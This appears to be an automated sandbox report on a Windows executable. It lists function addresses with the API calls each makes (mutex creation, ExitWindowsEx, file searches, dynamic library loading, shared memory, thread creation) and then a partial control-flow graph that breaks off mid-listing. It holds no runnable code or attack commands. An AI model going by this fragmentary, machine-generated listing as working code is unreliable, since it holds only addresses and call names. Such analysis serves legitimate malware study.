11061290 268 API calls 108917->108919 108918->108907 108973 11051360 354 API calls 4 library calls 108918->108973 108974 110684e0 298 API calls std::locale::_Init 108918->108974 108921 11142a47 108919->108921 108922 11142b7a LeaveCriticalSection 108920->108922 108926 1102b140 283 API calls 108920->108926 108925 11061320 274 API calls 108921->108925 108927 11142b8e 108922->108927 108958 11142bce 108922->108958 108923 11147060 std::locale::_Init 21 API calls 108923->108935 108924->108916 108942 11142a56 108925->108942 108929 11142b77 108926->108929 108934 11147060 std::locale::_Init 21 API calls 108927->108934 108927->108958 108929->108922 108930 11134310 273 API calls 108933 11142bd8 108930->108933 108931 11061320 274 API calls 108931->108935 108932 11142a91 108937 11061170 69 API calls 108932->108937 108936 110d1930 268 API calls 108933->108936 108938 11142b9c 108934->108938 108935->108917 108935->108923 108935->108931 108940 11142be6 108936->108940 108941 11142a9f 108937->108941 108945 11142010 385 API calls 108938->108945 108939 11147060 std::locale::_Init 21 API calls 108939->108942 108975 110d0170 265 API calls std::locale::_Init 108940->108975 108943 11061170 69 API calls 108941->108943 108942->108932 108942->108939 108944 11061320 274 API calls 108942->108944 108946 11142aae 108943->108946 108944->108942 108947 11142ba7 108945->108947 108949 11061170 69 API calls 108946->108949 108951 11147060 std::locale::_Init 21 API calls 108947->108951 108947->108958 108949->108892 108950 11142c1c 108966 11142c9f 108950->108966 108976 110d1530 265 API calls 108950->108976 108953 11142bc0 108951->108953 108956 11027200 403 API calls 108953->108956 108954 110d0a10 265 API calls 108957 11142cdb 108954->108957 108956->108958 108958->108930 108966->108954 108972->108905 108973->108918 108974->108918 108975->108950 108978 1112d87c 108977->108978 108979 1112d8b7 108978->108979 108981 1112d8a4 108978->108981 109001 1106c340 298 API calls 108979->109001 108982 11147af0 269 API calls 108981->108982 108983 1112d8af 108982->108983 108984 11142e60 std::locale::_Init 265 API calls 108983->108984 108985 1112d903 108983->108985 108984->108985 108985->108767 108985->108769 108986->108746 108987->108754 108988->108759 108989->108765 108990->108772 108991->108771 108992->108788 108993->108791 108994->108801 108995->108786 108996->108808 108997->108780 108998->108793 108999->108784 109000->108803 109001->108983 109002 6cef1dfc 109003 6cef1e0b 109002->109003 109004 6cefc840 109002->109004 109009 6cef1d3f 109003->109009 109047 6cefc84a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 109004->109047 109007 6cef1e16 109008 6cefc845 109008->109008 109010 6cef1d4b __tmpnam_helper 109009->109010 109011 6cef1d57 109010->109011 109012 6cefb8b1 109010->109012 109014 6cefb911 109011->109014 109015 6cef1d61 109011->109015 109057 6cefb359 HeapCreate 109012->109057 109019 6cf17448 _cexit 109014->109019 109022 6cf07b4e 109014->109022 109027 6cf07b5c 109014->109027 109016 6cef1d6a 109015->109016 109017 6cef2967 109015->109017 109048 6cef0341 TlsGetValue 109016->109048 109024 6cef1dd1 __tmpnam_helper 109017->109024 109059 6cef28f9 55 API calls __threadstartex@4 109017->109059 109019->109022 109022->109027 109064 6cf66d78 42 API calls __wpopen 109022->109064 109024->109007 109026 6cef1d83 109026->109024 109051 6cef1e1c 109026->109051 109061 6cf66d78 42 API calls __wpopen 109027->109061 109062 6cf666ba HeapDestroy 109027->109062 109063 6cf3c335 45 API calls __wpopen 109027->109063 109028 6cf17457 109065 6cf3c335 45 API calls __wpopen 109028->109065 109032 6cefb8b6 109032->109027 109038 6cefb8dd GetCommandLineA GetCommandLineW 109032->109038 109035 6cf1745c 109066 6cf666ba HeapDestroy 109035->109066 109037 6cef1d9f DecodePointer 109040 6cef1db4 109037->109040 109044 6cefb8fd 109038->109044 109039 6cf17461 109067 6cef014e 41 API calls 2 library calls 109039->109067 109040->109039 109041 6cef1dbc 109040->109041 109058 6cef1e9b 41 API calls __tmpnam_helper 109041->109058 109044->109027 109060 6cefc427 57 API calls Concurrency::details::SchedulerBase::GetPolicy 109044->109060 109045 6cef1dc3 GetCurrentThreadId 109045->109024 109047->109008 109049 6cef035a TlsGetValue 109048->109049 109050 6cef1e57 DecodePointer TlsSetValue 109048->109050 109049->109026 109052 6cef1e25 109051->109052 109054 6cef1d93 109052->109054 109055 6cf1f1d0 Sleep 109052->109055 109068 6cef09a9 109052->109068 109054->109027 109054->109037 109056 6cef1e45 109055->109056 109056->109052 109056->109054 109057->109032 109058->109045 109059->109024 109060->109014 109061->109027 109062->109027 109063->109027 109064->109028 109065->109035 109066->109039 109067->109027 109069 6cef09c5 109068->109069 109070 6cef09b5 109068->109070 109072 6cef09df RtlAllocateHeap 109069->109072 109074 6cf1f3f5 _callnewh 109069->109074 109076 6cef09f6 109069->109076 109070->109069 109071 6cf1f3d7 109070->109071 109077 6cef0815 41 API calls __tmpnam_helper 109071->109077 109072->109069 109072->109076 109074->109069 109074->109076 109075 6cf1f3dc 109075->109052 109076->109052 109077->109075 109078 11135c20 109079 11135c29 109078->109079 109085 11135c58 109078->109085 109080 11145ef0 std::locale::_Init 90 API calls 109079->109080 109081 11135c2e 109080->109081 109082 11133b00 274 API calls 109081->109082 109081->109085 109083 11135c37 109082->109083 109084 1105e820 79 API calls 109083->109084 109083->109085 109084->109085 109086 1115cca0 109087 1115ccb4 109086->109087 109088 1115ccac 109086->109088 109089 1116406b _calloc 66 API calls 109087->109089 109090 1115ccc8 109089->109090 109091 1115ccd4 109090->109091 109092 1115ce00 109090->109092 109098 1115c8e0 CoInitializeSecurity CoCreateInstance 109090->109098 109094 11163aa5 _free 66 API calls 109092->109094 109095 1115ce28 109094->109095 109096 1115ccf1 109096->109092 109097 1115cde4 SetLastError 109096->109097 109097->109096 109099 1115c955 wsprintfW SysAllocString 109098->109099 109100 1115cad4 109098->109100 109104 1115c99b 109099->109104 109101 11162bb7 __87except 5 API calls 109100->109101 109102 1115cb00 109101->109102 109102->109096 109103 1115cac1 SysFreeString 109103->109100 109104->109103 109105 1115caa9 109104->109105 109106 1115ca2c 109104->109106 109107 1115ca1a wsprintfW 109104->109107 109105->109103 109115 110978f0 109106->109115 109107->109106 109109 1115ca3e 109110 110978f0 266 API calls 109109->109110 109111 1115ca53 109110->109111 109120 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 109111->109120 109113 1115ca97 109121 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 109113->109121 109116 111101b0 std::locale::_Init 265 API calls 109115->109116 109117 11097923 109116->109117 109118 11097936 SysAllocString 109117->109118 109119 11097954 109117->109119 109118->109119 109119->109109 109120->109113 109121->109105 109122 1102d9f4 109123 1102da01 109122->109123 109124 1102da22 109123->109124 109209 1109f5f0 273 API calls std::locale::_Init 109123->109209 109210 11029490 455 API calls std::locale::_Init 109124->109210 109127 1102da33 109192 11028690 SetEvent 109127->109192 109129 1102da38 109130 1102da42 109129->109130 109131 1102da4d 109129->109131 109211 110eccf0 453 API calls 109130->109211 109133 1102da6a 109131->109133 109134 1102da6f 109131->109134 109212 11059fb0 SetEvent 109133->109212 109136 1102da77 109134->109136 109137 1102daae 109134->109137 109136->109137 109143 1102daa3 Sleep 109136->109143 109138 11147060 std::locale::_Init 21 API calls 109137->109138 109139 1102dab8 109138->109139 109140 1102dac5 109139->109140 109141 1102daf6 109139->109141 109140->109139 109144 1105e820 79 API calls 109140->109144 109142 1102daf3 109141->109142 109193 110b0470 109141->109193 109142->109141 109143->109137 109145 1102dae8 109144->109145 109145->109141 109213 1102d750 294 API calls std::locale::_Init 109145->109213 109152 1102db3a 109153 1102db4d 109152->109153 109215 111361c0 299 API calls 5 library calls 109152->109215 109155 1100d620 FreeLibrary 109153->109155 109156 1102de59 109155->109156 109157 1102de70 109156->109157 109158 1100d330 wsprintfA 109156->109158 109159 1102dfb3 109157->109159 109162 1102de97 GetModuleFileNameA GetFileAttributesA 109157->109162 109160 1102de65 109158->109160 109164 11147060 std::locale::_Init 21 API calls 109159->109164 109161 11147060 std::locale::_Init 21 API calls 109160->109161 109161->109157 109162->109159 109163 1102debf 109162->109163 109165 111101b0 std::locale::_Init 265 API calls 109163->109165 109166 1102e062 109164->109166 109167 1102dec6 109165->109167 109218 11147020 FreeLibrary 109166->109218 109171 11143630 267 API calls 109167->109171 109169 1102e06a 109170 1102e0a6 109169->109170 109172 1102e094 ExitWindowsEx 109169->109172 109173 1102e084 ExitWindowsEx Sleep 109169->109173 109174 1102e0b6 109170->109174 109175 1102e0ab Sleep 109170->109175 109179 1102dee8 109171->109179 109172->109170 109173->109172 109176 11147060 std::locale::_Init 21 API calls 109174->109176 109175->109174 109178 1102e0c0 ExitProcess 109176->109178 109180 11143780 86 API calls 109179->109180 109181 1102df0d 109180->109181 109181->109159 109182 11081e00 std::locale::_Init IsDBCSLeadByte 109181->109182 109183 1102df23 109182->109183 109184 1102df3e _memset 109183->109184 109216 11029a70 265 API calls 2 library calls 109183->109216 109186 1102df58 FindFirstFileA 109184->109186 109187 1102df78 FindNextFileA 109186->109187 109189 1102df98 FindClose 109187->109189 109190 1102dfa4 109189->109190 109217 111273e0 291 API calls 5 library calls 109190->109217 109192->109129 109219 110808b0 109193->109219 109198 1102db1a 109202 110eb4a0 109198->109202 109199 110b04b7 109231 11029a70 265 API calls 2 library calls 109199->109231 109203 110b0470 267 API calls 109202->109203 109204 110eb4cd 109203->109204 109247 110ea880 109204->109247 109208 1102db25 109214 110b0660 267 API calls std::locale::_Init 109208->109214 109209->109124 109210->109127 109211->109131 109212->109134 109213->109142 109214->109152 109215->109153 109217->109159 109218->109169 109220 110808d4 109219->109220 109221 110808d8 109220->109221 109222 110808ef 109220->109222 109232 11029a70 265 API calls 2 library calls 109221->109232 109224 11080908 109222->109224 109225 110808ec 109222->109225 109228 110b0460 109224->109228 109225->109222 109233 11029a70 265 API calls 2 library calls 109225->109233 109234 11081590 109228->109234 109235 110815dd 109234->109235 109236 110815b1 109234->109236 109238 1108162a wsprintfA 109235->109238 109239 11081605 wsprintfA 109235->109239 109236->109235 109237 110815cb 109236->109237 109240 11162bb7 __87except 5 API calls 109237->109240 109246 11029a70 265 API calls 2 library calls 109238->109246 109239->109235 109242 110815d9 109240->109242 109242->109198 109242->109199 109248 110ea88b 109247->109248 109249 110ea925 109248->109249 109250 110ea8ae 109248->109250 109251 110ea8c5 109248->109251 109257 110b0660 267 API calls std::locale::_Init 109249->109257 109258 11029a70 265 API calls 2 library calls 109250->109258 109253 110ea8c2 109251->109253 109254 110ea8f2 SendMessageTimeoutA 109251->109254 109253->109251 109259 11029a70 265 API calls 2 library calls 109253->109259 109254->109249 109257->109208 109260 110310d5 GetNativeSystemInfo 109261 110310e1 109260->109261 109265 11031081 109261->109265 109266 11031145 109261->109266 109275 11031088 109261->109275 109262 110312db GetStockObject GetObjectA 109263 1103130a SetErrorMode SetErrorMode 109262->109263 109267 111101b0 std::locale::_Init 265 API calls 109263->109267 109269 111101b0 std::locale::_Init 265 API calls 109265->109269 109268 111101b0 std::locale::_Init 265 API calls 109266->109268 109270 11031346 109267->109270 109271 1103114c 109268->109271 109269->109275 109272 11028980 268 API calls 109270->109272 109328 110fae60 272 API calls std::locale::_Init 109271->109328 109274 11031360 109272->109274 109276 111101b0 std::locale::_Init 265 API calls 109274->109276 109275->109262 109277 11031386 109276->109277 109278 11028980 268 API calls 109277->109278 109279 1103139f InterlockedExchange 109278->109279 109281 111101b0 std::locale::_Init 265 API calls 109279->109281 109282 110313c7 109281->109282 109283 1108a880 267 API calls 109282->109283 109284 110313df GetACP 109283->109284 109286 11163f93 _sprintf 102 API calls 109284->109286 109287 11031406 109286->109287 109288 111663a3 _setlocale 101 API calls 109287->109288 109289 11031410 109288->109289 109290 11143780 86 API calls 109289->109290 109291 1103143c 109290->109291 109292 111101b0 std::locale::_Init 265 API calls 109291->109292 109293 1103145c 109292->109293 109294 11061aa0 301 API calls 109293->109294 109296 11031487 109294->109296 109295 110314d4 109298 110ccc90 4 API calls 109295->109298 109296->109295 109297 111101b0 std::locale::_Init 265 API calls 109296->109297 109299 110314ae 109297->109299 109300 110314fa 109298->109300 109303 11061710 293 API calls 109299->109303 109301 111101b0 std::locale::_Init 265 API calls 109300->109301 109302 11031501 109301->109302 109304 11125d40 506 API calls 109302->109304 109303->109295 109305 11031523 109304->109305 109306 11114fb0 268 API calls 109305->109306 109307 11031544 109306->109307 109308 111101b0 std::locale::_Init 265 API calls 109307->109308 109309 1103155b 109308->109309 109310 11088b30 268 API calls 109309->109310 109311 11031573 109310->109311 109312 111101b0 std::locale::_Init 265 API calls 109311->109312 109313 1103158a 109312->109313 109314 1105cdb0 325 API calls 109313->109314 109315 110315ae 109314->109315 109316 1105d1a0 428 API calls 109315->109316 109317 110315d4 109316->109317 109318 11027810 122 API calls 109317->109318 109319 110315d9 109318->109319 109320 1100d620 FreeLibrary 109319->109320 109321 110315f4 109320->109321 109322 1100d330 wsprintfA 109321->109322 109325 1103160d 109321->109325 109323 11031602 109322->109323 109324 11147060 std::locale::_Init 21 API calls 109323->109324 109324->109325 109326 11162bb7 __87except 5 API calls 109325->109326 109327 11031773 109326->109327 109328->109275 109329 11089cf0 109330 111103d0 ___DllMainCRTStartup 4 API calls 109329->109330 109331 11089d03 109330->109331 109332 11089d0d 109331->109332 109341 11089430 268 API calls std::locale::_Init 109331->109341 109334 11089d34 109332->109334 109342 11089430 268 API calls std::locale::_Init 109332->109342 109337 11089d43 109334->109337 109338 11089cc0 109334->109338 109343 11089950 109338->109343 109341->109332 109342->109334 109384 11088c40 6 API calls ___DllMainCRTStartup 109343->109384 109345 11089989 GetParent 109346 1108999c 109345->109346 109347 110899ad 109345->109347 109348 110899a0 GetParent 109346->109348 109349 11145990 267 API calls 109347->109349 109348->109347 109348->109348 109350 110899b9 109349->109350 109351 11164ead std::locale::_Init 143 API calls 109350->109351 109352 110899c6 std::ios_base::_Ios_base_dtor 109351->109352 109353 11145990 267 API calls 109352->109353 109354 110899df 109353->109354 109385 11013dd0 22 API calls 2 library calls 109354->109385 109356 110899fa 109356->109356 109357 11143e00 std::locale::_Init 8 API calls 109356->109357 109360 11089a3a std::ios_base::_Ios_base_dtor 109357->109360 109358 11089a55 109359 11164c77 std::locale::_Init 102 API calls 109358->109359 109362 11089a73 std::locale::_Init 109358->109362 109359->109362 109360->109358 109361 11142e60 std::locale::_Init 265 API calls 109360->109361 109361->109358 109364 1102ad70 std::locale::_Init 145 API calls 109362->109364 109375 11089b24 std::ios_base::_Ios_base_dtor 109362->109375 109363 11162bb7 __87except 5 API calls 109365 11089c12 109363->109365 109366 11089ac3 109364->109366 109365->109337 109367 11142e60 std::locale::_Init 265 API calls 109366->109367 109368 11089acb 109367->109368 109369 11081e00 std::locale::_Init IsDBCSLeadByte 109368->109369 109370 11089ae2 109369->109370 109371 11081e70 86 API calls 109370->109371 109370->109375 109372 11089afa 109371->109372 109373 11089b3e 109372->109373 109374 11089b01 109372->109374 109377 11081e70 86 API calls 109373->109377 109386 110b7aa0 109374->109386 109375->109363 109379 11089b49 109377->109379 109379->109375 109381 110b7aa0 68 API calls 109379->109381 109380 110b7aa0 68 API calls 109380->109375 109382 11089b56 109381->109382 109382->109375 109383 110b7aa0 68 API calls 109382->109383 109383->109375 109384->109345 109385->109356 109389 110b7a80 109386->109389 109392 111681a3 109389->109392 109395 11168124 109392->109395 109396 11168131 109395->109396 109397 1116814b 109395->109397 109413 1116a1c2 66 API calls __getptd_noexit 109396->109413 109397->109396 109398 11168154 GetFileAttributesA 109397->109398 109400 11168162 GetLastError 109398->109400 109407 11168178 109398->109407 109416 1116a1d5 66 API calls 2 library calls 109400->109416 109401 11168136 109414 1116a1af 66 API calls __getptd_noexit 109401->109414 109403 11089b07 109403->109375 109403->109380 109405 1116816e 109417 1116a1af 66 API calls __getptd_noexit 109405->109417 109406 1116813d 109415 1116edc4 11 API calls __mbsnbicmp_l 109406->109415 109407->109403 109418 1116a1c2 66 API calls __getptd_noexit 109407->109418 109411 1116818b 109419 1116a1af 66 API calls __getptd_noexit 109411->109419 109413->109401 109414->109406 109415->109403 109416->109405 109417->109403 109418->109411 109419->109405 109420 11030b78 109421 11143630 267 API calls 109420->109421 109422 11030b86 109421->109422 109423 11143780 86 API calls 109422->109423 109424 11030bc3 109423->109424 109425 11030bd8 109424->109425 109427 11081e70 86 API calls 109424->109427 109426 110ed520 8 API calls 109425->109426 109428 11030bff 109426->109428 109427->109425 109431 11030c49 109428->109431 109488 110ed5d0 81 API calls 2 library calls 109428->109488 109430 11030c14 109489 110ed5d0 81 API calls 2 library calls 109430->109489 109432 11143780 86 API calls 109431->109432 109434 11030c60 109432->109434 109436 111101b0 std::locale::_Init 265 API calls 109434->109436 109435 11030c2b 109435->109431 109437 11146fe0 19 API calls 109435->109437 109438 11030c6f 109436->109438 109437->109431 109439 11030c90 109438->109439 109440 11088b30 268 API calls 109438->109440 109441 1108a880 267 API calls 109439->109441 109440->109439 109442 11030ca3 OpenMutexA 109441->109442 109443 11030cc3 CreateMutexA 109442->109443 109444 11030dda CloseHandle 109442->109444 109446 11030ce3 109443->109446 109481 1108a980 109444->109481 109447 111101b0 std::locale::_Init 265 API calls 109446->109447 109448 11030cf8 109447->109448 109450 11030d1b 109448->109450 109451 11061710 293 API calls 109448->109451 109449 11030df0 109452 11162bb7 __87except 5 API calls 109449->109452 109471 110161e0 LoadLibraryA 109450->109471 109451->109450 109454 11031773 109452->109454 109455 11030d2d 109456 11145c70 std::locale::_Init 90 API calls 109455->109456 109457 11030d3c 109456->109457 109458 11030d49 109457->109458 109459 11030d5c 109457->109459 109472 111466b0 109458->109472 109460 11030d66 GetProcAddress 109459->109460 109461 11030d50 109459->109461 109460->109461 109463 11030d80 SetLastError 109460->109463 109464 110287a0 47 API calls 109461->109464 109463->109461 109465 11030d8d 109464->109465 109490 11009370 429 API calls std::locale::_Init 109465->109490 109467 11030d9c 109468 11030db0 WaitForSingleObject 109467->109468 109468->109468 109469 11030dc2 CloseHandle 109468->109469 109469->109444 109470 11030dd3 FreeLibrary 109469->109470 109470->109444 109471->109455 109473 11145c70 std::locale::_Init 90 API calls 109472->109473 109474 111466c2 109473->109474 109475 11146700 109474->109475 109476 111466c9 LoadLibraryA 109474->109476 109475->109461 109477 111466fa 109476->109477 109478 111466db GetProcAddress 109476->109478 109477->109461 109479 111466f3 FreeLibrary 109478->109479 109480 111466eb 109478->109480 109479->109477 109480->109479 109482 1108aa27 109481->109482 109485 1108a9ba std::ios_base::_Ios_base_dtor 109481->109485 109483 1108aa2e DeleteCriticalSection 109482->109483 109491 1115c2d0 109483->109491 109484 1108a9ce CloseHandle 109484->109485 109485->109482 109485->109484 109487 1108aa54 std::ios_base::_Ios_base_dtor 109487->109449 109488->109430 109489->109435 109490->109467 109494 1115c2e4 109491->109494 109492 1115c2e8 109492->109487 109494->109492 109494->109494 109495 1115c040 67 API calls 2 library calls 109494->109495 109495->109494 109496 1116a5cd 109497 1116a5dd 109496->109497 109498 1116a5d8 109496->109498 109502 1116a4d7 109497->109502 109514 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 109498->109514 109501 1116a5eb 109503 1116a4e3 __CRT_INIT@12 109502->109503 109507 1116a530 109503->109507 109511 1116a580 __CRT_INIT@12 109503->109511 109515 1116a373 109503->109515 109506 1116a543 109508 1116a560 109506->109508 109566 11026410 7 API calls ___DllMainCRTStartup 109506->109566 109507->109511 109565 11026410 7 API calls ___DllMainCRTStartup 109507->109565 109509 1116a373 __CRT_INIT@12 149 API calls 109508->109509 109508->109511 109509->109511 109511->109501 109512 1116a557 109513 1116a373 __CRT_INIT@12 149 API calls 109512->109513 109513->109508 109514->109497 109516 1116a37f __CRT_INIT@12 109515->109516 109517 1116a387 109516->109517 109518 1116a401 109516->109518 109567 1116e390 HeapCreate 109517->109567 109519 1116a462 109518->109519 109525 1116a407 109518->109525 109521 1116a467 109519->109521 109522 1116a4c0 109519->109522 109523 1116c4ba ___set_flsgetvalue 3 API calls 109521->109523 109535 1116a390 __CRT_INIT@12 109522->109535 109661 1116c7be 79 API calls __freefls@4 109522->109661 109531 1116a46c 109523->109531 109524 1116a425 109529 1116a439 109524->109529 109656 1117226e 67 API calls _free 109524->109656 109525->109524 109525->109535 109655 1116e65b 66 API calls _doexit 109525->109655 109526 1116a38c 109526->109535 109568 1116c82c GetModuleHandleW 109526->109568 109659 1116a44c 70 API calls __mtterm 109529->109659 109536 1116ac7e __calloc_crt 66 API calls 109531->109536 109532 1116a39c __RTC_Initialize 109538 1116a3a0 109532->109538 109543 1116a3ac GetCommandLineA 109532->109543 109535->109507 109537 1116a478 109536->109537 109537->109535 109540 1116a484 DecodePointer 109537->109540 109652 1116e3ae HeapDestroy 109538->109652 109539 1116a42f 109657 1116c50b 70 API calls _free 109539->109657 109545 1116a499 109540->109545 109593 11177e54 GetEnvironmentStringsW 109543->109593 109544 1116a434 109658 1116e3ae HeapDestroy 109544->109658 109548 1116a4b4 109545->109548 109549 1116a49d 109545->109549 109552 11163aa5 _free 66 API calls 109548->109552 109660 1116c548 66 API calls 4 library calls 109549->109660 109552->109535 109554 1116a4a4 GetCurrentThreadId 109554->109535 109556 1116a3ca 109653 1116c50b 70 API calls _free 109556->109653 109560 1116a3ea 109560->109535 109654 1117226e 67 API calls _free 109560->109654 109565->109506 109566->109512 109567->109526 109569 1116c840 109568->109569 109570 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 109568->109570 109662 1116c50b 70 API calls _free 109569->109662 109572 1116c893 TlsAlloc 109570->109572 109575 1116c9a2 109572->109575 109576 1116c8e1 TlsSetValue 109572->109576 109574 1116c845 109574->109532 109575->109532 109576->109575 109577 1116c8f2 109576->109577 109663 1116e417 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 109577->109663 109579 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 109664 11174425 InitializeCriticalSectionAndSpinCount 109579->109664 109581 1116c936 109582 1116c99d 109581->109582 109583 1116c93a DecodePointer 109581->109583 109666 1116c50b 70 API calls _free 109582->109666 109585 1116c94f 109583->109585 109585->109582 109586 1116ac7e __calloc_crt 66 API calls 109585->109586 109587 1116c965 109586->109587 109587->109582 109588 1116c96d DecodePointer 109587->109588 109589 1116c97e 109588->109589 109589->109582 109590 1116c982 109589->109590 109665 1116c548 66 API calls 4 library calls 109590->109665 109592 1116c98a GetCurrentThreadId 109592->109575 109594 11177e70 WideCharToMultiByte 109593->109594 109595 1116a3bc 109593->109595 109597 11177ea5 109594->109597 109598 11177edd FreeEnvironmentStringsW 109594->109598 109606 11172029 GetStartupInfoW 109595->109606 109599 1116ac39 __malloc_crt 66 API calls 109597->109599 109598->109595 109600 11177eab 109599->109600 109600->109598 109601 11177eb3 WideCharToMultiByte 109600->109601 109602 11177ec5 109601->109602 109603 11177ed1 FreeEnvironmentStringsW 109601->109603 109604 11163aa5 _free 66 API calls 109602->109604 109603->109595 109605 11177ecd 109604->109605 109605->109603 109607 1116ac7e __calloc_crt 66 API calls 109606->109607 109613 11172047 109607->109613 109608 1116a3c6 109608->109556 109619 11177d99 109608->109619 109609 111721f2 GetStdHandle 109612 111721bc 109609->109612 109610 1116ac7e __calloc_crt 66 API calls 109610->109613 109611 11172256 SetHandleCount 109611->109608 109612->109609 109612->109611 109614 11172204 GetFileType 109612->109614 109618 1117222a InitializeCriticalSectionAndSpinCount 109612->109618 109613->109608 109613->109610 109613->109612 109617 1117213c 109613->109617 109614->109612 109615 11172173 InitializeCriticalSectionAndSpinCount 109615->109608 109615->109617 109616 11172168 GetFileType 109616->109615 109616->109617 109617->109612 109617->109615 109617->109616 109618->109608 109618->109612 109620 11177db3 GetModuleFileNameA 109619->109620 109621 11177dae 109619->109621 109623 11177dda 109620->109623 109673 11171a45 94 API calls __setmbcp 109621->109673 109667 11177bff 109623->109667 109625 1116a3d6 109625->109560 109630 11177b23 109625->109630 109627 1116ac39 __malloc_crt 66 API calls 109628 11177e1c 109627->109628 109628->109625 109629 11177bff _parse_cmdline 76 API calls 109628->109629 109629->109625 109631 11177b2c 109630->109631 109634 11177b31 _strlen 109630->109634 109675 11171a45 94 API calls __setmbcp 109631->109675 109633 1116a3df 109633->109560 109646 1116e46e 109633->109646 109634->109633 109635 1116ac7e __calloc_crt 66 API calls 109634->109635 109642 11177b66 _strlen 109635->109642 109636 11177bb5 109637 11163aa5 _free 66 API calls 109636->109637 109637->109633 109638 1116ac7e __calloc_crt 66 API calls 109638->109642 109639 11177bdb 109641 11163aa5 _free 66 API calls 109639->109641 109640 1116cd5f _strcpy_s 66 API calls 109640->109642 109641->109633 109642->109633 109642->109636 109642->109638 109642->109639 109642->109640 109643 11177bf2 109642->109643 109644 1116ed72 __invoke_watson 10 API calls 109643->109644 109645 11177bfe 109644->109645 109647 1116e47c __IsNonwritableInCurrentImage 109646->109647 109676 1116d88b EncodePointer 109647->109676 109649 1116e49a __initterm_e 109651 1116e4bb __IsNonwritableInCurrentImage 109649->109651 109677 11163dd5 76 API calls __cinit 109649->109677 109651->109560 109652->109535 109653->109538 109654->109556 109655->109524 109656->109539 109657->109544 109658->109529 109659->109535 109660->109554 109661->109535 109662->109574 109663->109579 109664->109581 109665->109592 109666->109575 109668 11177c1e 109667->109668 109671 11177c8b 109668->109671 109674 11177590 76 API calls x_ismbbtype_l 109668->109674 109670 11177d89 109670->109625 109670->109627 109671->109670 109672 11177590 76 API calls _parse_cmdline 109671->109672 109672->109671 109673->109620 109674->109668 109675->109634 109676->109649 109677->109651

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 783 1109e641-1109e655 LocalAlloc 777->783 784 1109e7a4-1109e7a6 777->784 780 1109ec32-1109ec4d call 11162bb7 778->780 786 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 783->786 787 1109ec25-1109ec2b call 1109d8f0 783->787 788 1109e736-1109e75b CreateFileMappingA 784->788 791 1109e71a-1109e730 786->791 792 1109e693-1109e6be call 1109d7d0 call 1109d810 786->792 787->778 789 1109e7a8-1109e7bb GetLastError 788->789 790 1109e75d-1109e77d GetLastError call 110d6c20 788->790 796 1109e7bd 789->796 797 1109e7c2-1109e7d9 MapViewOfFile 789->797 802 1109e788-1109e790 790->802 803 1109e77f-1109e786 LocalFree 790->803 791->788 823 1109e709-1109e711 792->823 824 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 792->824 796->797 800 1109e7db-1109e7f6 call 110d6c20 797->800 801 1109e817-1109e81f 797->801 816 1109e7f8-1109e7f9 LocalFree 800->816 817 1109e7fb-1109e803 800->817 804 1109e8c1-1109e8d3 801->804 805 1109e825-1109e83e GetModuleFileNameA 801->805 813 1109e792-1109e793 LocalFree 802->813 814 1109e795-1109e79f 802->814 803->802 809 1109e919-1109e932 call 11162be0 GetTickCount 804->809 810 1109e8d5-1109e8d8 804->810 811 1109e8dd-1109e8f8 call 110d6c20 805->811 812 1109e844-1109e84d 805->812 836 1109e934-1109e939 809->836 820 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 810->820 837 1109e8fa-1109e8fb LocalFree 811->837 838 1109e8fd-1109e905 811->838 812->811 821 1109e853-1109e856 812->821 813->814 822 1109ec1e-1109ec20 call 1109dce0 814->822 816->817 827 1109e808-1109e812 817->827 828 1109e805-1109e806 LocalFree 817->828 844 1109ea2b-1109ea42 CreateEventA 820->844 845 1109ea25 820->845 830 1109e899-1109e8bc call 110d6c20 call 1109dce0 821->830 831 1109e858-1109e85c 821->831 822->787 823->791 826 1109e713-1109e714 FreeLibrary 823->826 824->823 834 1109e6f8-1109e703 SetSecurityDescriptorSacl 824->834 826->791 827->822 828->827 830->804 831->830 840 1109e85e-1109e869 831->840 834->823 841 1109e93b-1109e94a 836->841 842 1109e94c 836->842 837->838 847 1109e90a-1109e914 838->847 848 1109e907-1109e908 LocalFree 838->848 846 1109e870-1109e874 840->846 841->836 841->842 849 1109e94e-1109e954 842->849 851 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 844->851 852 1109ea66-1109ea6e 844->852 845->844 853 1109e890-1109e892 846->853 854 1109e876-1109e878 846->854 847->822 848->847 858 1109e965-1109e9bd 849->858 859 1109e956-1109e963 849->859 851->852 855 1109ea70 852->855 856 1109ea76-1109ea87 CreateEventA 852->856 857 1109e895-1109e897 853->857 860 1109e87a-1109e880 854->860 861 1109e88c-1109e88e 854->861 855->856 863 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 856->863 864 1109eaab-1109eab3 856->864 857->811 857->830 858->820 859->849 859->858 860->853 866 1109e882-1109e88a 860->866 861->857 863->864 868 1109eabb-1109eacd CreateEventA 864->868 869 1109eab5 864->869 866->846 866->861 871 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->871 872 1109eaf1-1109eaf9 868->872 869->868 871->872 874 1109eafb 872->874 875 1109eb01-1109eb12 CreateEventA 872->875 874->875 877 1109eb34-1109eb42 875->877 878 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->878 880 1109eb44-1109eb45 LocalFree 877->880 881 1109eb47-1109eb4f 877->881 878->877 880->881 883 1109eb51-1109eb52 LocalFree 881->883 884 1109eb54-1109eb5d 881->884 883->884 885 1109eb63-1109eb66 884->885 886 1109ec07-1109ec19 call 110d6c20 884->886 885->886 888 1109eb6c-1109eb6f 885->888 886->822 888->886 890 1109eb75-1109eb78 888->890 890->886 891 1109eb7e-1109eb81 890->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 